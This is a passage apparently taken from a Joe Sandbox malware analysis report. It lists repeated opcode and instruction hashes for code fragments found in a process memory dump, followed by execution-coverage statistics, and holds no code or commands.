                                                                                                                                                                                                                                  • Instruction ID: 8b1dfb43941dc6027f25fe0e84edc5410b8e0c9a8a3fd5ab91b1619a02b5c55a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3ee8140fef875cacac12fca6999cd11a44607f1c3f3d2d1101f5fe77f503659
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66815B21B1EE8E0BE79AA76888757B97FD1EF94300F6540BED05DC75DBDD28A8028341
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 480a56d93dd18ccb6e76b02e77d0d63f17aab2b99e973cf9bf6c04aa3178e8ef
                                                                                                                                                                                                                                  • Instruction ID: 22e0761d11be3aa8c478257abac121c4600bf5cd9b9d65f701457d570bfd02ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 480a56d93dd18ccb6e76b02e77d0d63f17aab2b99e973cf9bf6c04aa3178e8ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9712561B1EA890FE79AABB858757A9BFD1EF89250F0500BBE04DC71D7CD1C6906C342
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a6afd70a66d04f4e559ce914ae7587efe3d01cfeddd3d3c585058480ab5a8890
                                                                                                                                                                                                                                  • Instruction ID: b2f00e85b7f39e9609d588fd043cfc8fdcc6fa6792221ca3dc06b77c5f2dd119
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6afd70a66d04f4e559ce914ae7587efe3d01cfeddd3d3c585058480ab5a8890
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8151D431B0A90E4FE799BBB884796B87BD2EF88304F514179E00DC76D7CE29A942C741
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7c0690205af4c8edc7d03d83a1d7f25b7c7820bdfc7fc27ad35ee85abb4626e9
                                                                                                                                                                                                                                  • Instruction ID: 515ea26ef0fb3cd4eefa39603237beba0280cd1fa3c6cf4652e00bb83cfc629d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c0690205af4c8edc7d03d83a1d7f25b7c7820bdfc7fc27ad35ee85abb4626e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951E620B0AA4A4FE79AA7B884797B87BD2EF85314B5541B9E00DC76D7CD29AC02C741
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e03d816a60b465d8c8058d93377328e55e575262971d0c842d48bfa2d857b52c
                                                                                                                                                                                                                                  • Instruction ID: b3b9a3144804156fdb935d5a2c2e5c1a7a50919ca026a92033286abe3cc878c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e03d816a60b465d8c8058d93377328e55e575262971d0c842d48bfa2d857b52c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2041A621B1890D4FEB94BBBC48297BDB6D2FF98350F5501B6E41DC32D7DD28A9028742
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ea8d879fdb1f67fb12017e1d730311127f1c55d3baf2a97548c71a2beaf2e444
                                                                                                                                                                                                                                  • Instruction ID: 50b3fc43d7b207423a913c5173157af2f8feff2e513e4dbfa8c9f74786a374d7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea8d879fdb1f67fb12017e1d730311127f1c55d3baf2a97548c71a2beaf2e444
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB419721B1890D4BEB94BBBC48297BDB6D2EF98750F55017AE41DC32D7DD2CA9028781
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9703d1a6c48e856eaef1bc98d431c9f7732aea049d9471176fa970d0cb9f9f6e
                                                                                                                                                                                                                                  • Instruction ID: 4fcc8f6f6da50f547dec650b3ad77e02109c16d56415c278e6d179cc5871e12a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9703d1a6c48e856eaef1bc98d431c9f7732aea049d9471176fa970d0cb9f9f6e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3541B820B28D0A4BE789FBAC8869BF9B6D1FF58344F544576E00EC32D7DE2C69458741
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d1246902be733a21bf06a7a146c552d2f742ba2d4815b1693a341a224874a50c
                                                                                                                                                                                                                                  • Instruction ID: c55e50bd0eabdbe327e03395a40e0f778b69b7dba0ff78332c90a5a332a8bd40
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1246902be733a21bf06a7a146c552d2f742ba2d4815b1693a341a224874a50c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66417C30E1494D8FEB95EFA8C8A5AFDBBB1FF58700F554139E009D32A6CE246941CB40
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 24e193c79c5ff129ea5f40f53fb1305c11be82c5afff719d59d81796fb011af9
                                                                                                                                                                                                                                  • Instruction ID: 99219672564f927b82141bb840997662b5c11cefeed260b5ae250c0e361affea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24e193c79c5ff129ea5f40f53fb1305c11be82c5afff719d59d81796fb011af9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E317F20F1981E4FE7E6FBA944797BEA9D1EF48310B520079D40DD36E7DD286D418740
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6306668cd8e5e3257864dcd70610753551e84dcd9009abda52a1e0e4250e8a25
                                                                                                                                                                                                                                  • Instruction ID: 4f59fe4f0904bba0e60a45cfba6c025f49367cda8ac7c1139ecfbe28adb95416
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6306668cd8e5e3257864dcd70610753551e84dcd9009abda52a1e0e4250e8a25
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44414331B0994D8FDF94FFA8C469AEDBBB1FF68300F550169D00AD76A6CE34A8428740
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: dca29d12471e77c5a2f149107434d9a4c0fb075c46e12203d3c1b9447ca119bc
                                                                                                                                                                                                                                  • Instruction ID: 4cdc6e118f86a824aadb6d84804b4c3dbb530834a17f7473bb44b786985c528d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dca29d12471e77c5a2f149107434d9a4c0fb075c46e12203d3c1b9447ca119bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D431E431F0991D5FEBE1EB9894657ADBBE1EF48704F0A0176E50DD3292CE2869418780
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7623a048ca41c27ea75175197c4158cf06cb031cc74004d5de35b0a90bcfad57
                                                                                                                                                                                                                                  • Instruction ID: ffa9830d46622d46ddd7667c2e31605d6b9e4a6e370fe7071b5d84ffe434ad91
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7623a048ca41c27ea75175197c4158cf06cb031cc74004d5de35b0a90bcfad57
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC310970B0A90D4FDFA5EBD498647EABBE0FF08314F450136E40CD31A2DA6AA980C751
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: abb8d7e2d64119128e37b7f86835ca74b66426f7a2ac33ddbe9e490237bbae58
                                                                                                                                                                                                                                  • Instruction ID: d24fd45260ba41d2ee200f964c190d2c624e3eb31a950859a3e070f7e5191ebe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abb8d7e2d64119128e37b7f86835ca74b66426f7a2ac33ddbe9e490237bbae58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C731C031F09D1D4FEBE0EB9894657ADBBE2EF88704F09017AE50DE3296CE246C408780
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a5a8bf09614b6e845326ad71f99eb873fa6c90a77d1d35dbe906236c8e8e8bb4
                                                                                                                                                                                                                                  • Instruction ID: 58712200b12f3c65b5e564a6c732818528119fb15e560963995cef257c33b4eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5a8bf09614b6e845326ad71f99eb873fa6c90a77d1d35dbe906236c8e8e8bb4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31DF5174F6CE0FD7A3A7AC58606B5AFD5EF57224B0A01FBE089C78A3D8091905C302
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: dc58f915b5fc8e2ca469a0c86f15f6ec342a83e0086fc4acd9b5fd9f68b12e59
                                                                                                                                                                                                                                  • Instruction ID: 17e8556c296fe1a1484e417797ba8e91aecddc4f8d8068c0abbbb50f22cdd893
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc58f915b5fc8e2ca469a0c86f15f6ec342a83e0086fc4acd9b5fd9f68b12e59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28213B31F0EA5D4FEBA6DB698851AE9BFE1EF85310F04017ED049C3592DE15AD42C741
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: dd8b3832761029b8b2b4cc641b3ada288745178dec286df05604a7e9ca8759f6
                                                                                                                                                                                                                                  • Instruction ID: af4077acda02ed1f3d31c3ec0e9e4d773168453cf2c5b29523e88a30d679b7d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd8b3832761029b8b2b4cc641b3ada288745178dec286df05604a7e9ca8759f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3821A220F1E91D4FE7E6BBA984797BABAD1EF49310F460079D40DD25A3DD286D418340
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b797dc77f1ab1042f970b664a506770696b0be53a10ee881deb941eadb3d7eec
                                                                                                                                                                                                                                  • Instruction ID: 002d9d0447d7c81fbdb16e527ff81363870108de797d67a8ca0143b9ec5b0fe8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b797dc77f1ab1042f970b664a506770696b0be53a10ee881deb941eadb3d7eec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6231675188F3C61FDB9397B489655C27FF59E87120B0E40EBE5C8CA4A7C54D490AC763
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2ed89f741d312e6ada5594c797bfd1ff3d496be979471c01cb43697822d7492d
                                                                                                                                                                                                                                  • Instruction ID: 03580d3d1cee25aa1bd616381a9d705468e4b8981cc5c682915346641997be69
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ed89f741d312e6ada5594c797bfd1ff3d496be979471c01cb43697822d7492d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E112962B0FAC94FE3EAAA6C14752A8BFA0EF95250F0D01FBD08DC74A7E90419458781
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c6dbf6a3dba4b4097a39f5e4767373c12288e36092bf65d996a91ada225ecbef
                                                                                                                                                                                                                                  • Instruction ID: afacccd005d2d37b0a72241987b73809b956a70a975f31fe4110a3beeaeccac0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6dbf6a3dba4b4097a39f5e4767373c12288e36092bf65d996a91ada225ecbef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50110662B0E8991FF7A69628482DAB63FD9DF9532430A01FBE44CC75A3DC085C428391
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9f8a08bf285146c601cf217ffdef079995249cf93c3ddbda60b31e6d6baabb65
                                                                                                                                                                                                                                  • Instruction ID: 3eef613d3e3ab7f6a752483e3f11892f01896c454f986a079aabc9aac7103aab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f8a08bf285146c601cf217ffdef079995249cf93c3ddbda60b31e6d6baabb65
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C11A731F1A91E4AEAF6A6C890617BCF791FF84310F920139D45E839D7CE19BE428681
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ceccf85b96e742b50148d674a6fa7d102902aa4c345d130112f4932bfda67adc
                                                                                                                                                                                                                                  • Instruction ID: c4f6f23b150a49740ee84497c7898d7ab66f1703073839f2223685f1c2063600
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceccf85b96e742b50148d674a6fa7d102902aa4c345d130112f4932bfda67adc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8F09C62F05C1D1FF7E5E61C485DF792ACADFA9655715017AE40DC31A6DC446C428380
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e3379cb8d59016ce8aa3f48acd914c428e096c2ec1e6843602c583455735aede
                                                                                                                                                                                                                                  • Instruction ID: c25d0b9933232e7e719f14ced1dd8dc2a025f9f928f45b24dfaa129b94b31bcf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3379cb8d59016ce8aa3f48acd914c428e096c2ec1e6843602c583455735aede
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFF0AC22B0DA850FE385BBB888AA9647FE1DF94200B0C00BAD849CB1B3CC1CD9834381
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7aaf590394fb9e47addca2b4beef700cf982fdb977218af9357d243d01296374
                                                                                                                                                                                                                                  • Instruction ID: 921857e72ed49b13f67b1f1e487fe5d288b22c631d89762bb4510feff91f2fad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7aaf590394fb9e47addca2b4beef700cf982fdb977218af9357d243d01296374
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF0E57260E64C1FF7589949AC179F67B98EBC7234F00005EE5CDC2152E15265238355
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0e0d2005f51e3fcca6a0ff2fbc89a55d95c2fe03b9f94300253a4aa32792af1b
                                                                                                                                                                                                                                  • Instruction ID: 8b0d3e13528354185afdbf5bea9b9f8cad4cefc1fbdc688f13be376d01cd20bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e0d2005f51e3fcca6a0ff2fbc89a55d95c2fe03b9f94300253a4aa32792af1b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79F0F012F0D90B0BEBE967AC28366B8A182AF84351F4444BEE40DC66DBDD1CAC459386
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1d8a8793900ab3e216e29305c95f68e820f2e8b0be81bd71da052c2eb76ec2f4
                                                                                                                                                                                                                                  • Instruction ID: 2cc1d71e237ff41a3f56ce90a5c93d80da36938d72c1c62093ee8c4e523492f1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d8a8793900ab3e216e29305c95f68e820f2e8b0be81bd71da052c2eb76ec2f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CE0D82260F5CC0BD7665B6448205E5BFA0BF41640F0D41F7D05C460A3E91497184281
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2198760779.00007FFD9B5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b5f0000_3CBD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1f104209219168af60cf07c1045bb6aa821422abf8ff438ad26a28a4c268187b
                                                                                                                                                                                                                                  • Instruction ID: 8ad0fcbd54a841d151f58153fb21e6652dd003e0c48567b2fd0940882797b4f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f104209219168af60cf07c1045bb6aa821422abf8ff438ad26a28a4c268187b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31C08C30E0A3064FC224E600842AB6DF1104F40211F108279882C022EA9F24510A8900

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:16.6%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:3.3%
                                                                                                                                                                                                                                  Total number of Nodes:90
                                                                                                                                                                                                                                  Total number of Limit Nodes:0
